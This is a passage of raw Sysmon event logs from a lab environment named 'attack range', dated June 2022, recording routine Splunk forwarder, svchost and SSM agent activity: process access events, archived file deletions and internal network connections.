14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044054Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044053Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044052Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044051Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044050Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-17D4-629A-1307-000000006002}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044049Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17D4-629A-1307-000000006002}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044048Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-17D4-629A-1307-000000006002}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044062Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:53.719{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A615A5DC472DB868F911F61AE6DA138,SHA256=C7D3CFDFCB510F087A117ABA9BEC577725BFB6D86E236B2B0DBB13DD7758E6A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044063Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:54.812{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=410270F687B2F023720D0ECFB65743E4,SHA256=366EA09C493BE994941A110F04AED3EA60313D277536AA9096E12F4FBDA2CB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044064Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:55.906{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B6E9D9219B0FF93DDDABE765DAA48EB,SHA256=4A65C76FC5BD2B2F83626BCB100F5F761441789FA07DAEEA5837E673180468C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044065Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:57.000{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CED2B728405D8D960B44E4FAD39300B,SHA256=75527539E604C4941E9C4F242D2EAA79F9AA9245F5D30491F1ADBADD9807F956,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:56.716{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56358-false10.0.1.12-8000- 354300x800000000000000044067Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:55.687{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52330-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044066Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:58.094{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F9AE11DDC84AC978E2858B8A870611,SHA256=D1355DCF94A1625AB6486F19716798B099E7F4FBDF971C136A946814161636FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044068Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:59.187{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05201E3E9DB4968ECBC9F809B4C15FD4,SHA256=0D41A46B94011FECB180EF06A2886DF40C8C2DBE58F03EE4578AF8DACA388D69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:00.807{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7C5513464F9CB1A6D09DEF73885BA09F,SHA256=3167A2FC677E2B7354BE07ABF90870A51ED30EB320003004B23BDAA90F069FDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044069Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:00.281{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD5636D385CFBB360C26DC9EE72FA5B1,SHA256=C7B4A82D61D6E0B119CAD83AE0937634CB04248048D4816F9D1DB7CD9F1E0F72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044070Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:01.375{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08C50E735903F42B5DE1CCD6540B7D94,SHA256=A171C07238DB8769E97CF40563FB5DAF23370C28E2B3C326C7C841B2B2A10D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044072Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:02.703{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2AF893367B0FD6979EFF505F8993F8A0,SHA256=A3D222F315F6EB85947AC85C23619A8986A4D317DA26C686F6393CF2BBD3A89D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044071Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:02.469{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F13DA49110A2C756398DD85D751A7BF,SHA256=BFD38F2C3D05E8B0C3E99EB31347ED78201AC85F1938D413C8993A06917E98ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:03.777{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-226MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044073Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:03.562{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCB68B7F8106D95DCDE5E5817277C992,SHA256=C2E131DEE6A35C6C560EEDA2615765881CC365C924811EA77E6D1C2F62F9A41F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:04.791{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-227MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:04.690{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7FBA1169A1A8F492B2C6FC423242094,SHA256=768F0DF2A867F6F2A3B10747A6E842B311548AA0D05E08A28EF48B1D8DC100B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044076Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:04.656{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9B82C3BCD46CD957CD35997DDAD12B,SHA256=1978DFC9F6E3FD0F44BCF07F0E9753D7B39A97FCBFD32F3EC9A8E504A5E552F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044075Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:04.156{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044074Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:01.671{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52331-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000205148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:02.662{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56359-false10.0.1.12-8000- 23542300x800000000000000044077Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:05.750{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8105EB632EB97D623E6759ED2A08FD8F,SHA256=E35D2D9E164E2A08392EE277DAF76ED9382AA194E6B61541281C6FFF4634EFC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044079Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:06.844{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5514BBE25A50C639B8B03058564E6BDE,SHA256=6147563EFE43F52D0644AB003F05EA9A2422FFAEFCFA9B8B0D58C213CB11BC31,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044078Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:03.702{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52332-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000044080Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:07.937{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B1A1F20F2E34071F1686E441CA6501,SHA256=A441669D7360FF544B73E8CCBE300E9AD419EDE4647F5D70382330D616150975,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044082Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:06.749{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52333-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044081Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:09.031{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF81515D1C8D36A91C81246DB76219E7,SHA256=18484EC6801DB2F77F05206DF8A53B3FDCD9FE84871FF816463B6D3A1735956C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:07.767{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56360-false10.0.1.12-8000- 23542300x800000000000000044083Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:10.125{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=746E285FB1A980FB2D9EE0F4CC0A2D36,SHA256=CD2CCC6AFCEDCFD5A3EC75010AC92F9D8FE017B6515AF71524C0128DBC7324E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044084Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:11.219{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3BA041D26A77C91DD0316B646C8317,SHA256=A77B3C8704D84B5DCE699A1DCD71E4FE4451E58AFB70AC81FBD4E845AFA25173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044085Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:12.312{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=567663D60E5E8169ECD0EBE468BB8A96,SHA256=844CBBE5D291DB89FD77D4E44FD79FFF6C13AA42E9C298804706416C09F893E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044086Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:13.406{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F2F004A077E32A1776B834BEFA7E7CD,SHA256=13760D34E5C84480D40E6615E16BDB07454604410B7F5A8E6AC21CD370C3B602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044088Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:14.500{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64A1FE01E12B071F9E08FBCC7542044A,SHA256=03B602D74C9CBFBDBFEC466B8EF3E2A513EA7A4E8201C113BB386B4BF47A23C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044087Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:11.764{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52334-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:15.792{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2C5498A18610A53D17DC6A7340D96CF,SHA256=8D3D78550895FFDD3AEBA9AF128AE1F755044F065317B0F8DCC0415234B9A417,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044089Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:15.594{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C90D30567212420CF116D195E2D5E6,SHA256=B66B7AB844AFC5BDC035E2EF90A826A1D3D079771494C4DEE79FC5C01307ED81,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:13.764{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56361-false10.0.1.12-8000- 23542300x800000000000000044090Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:16.687{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program 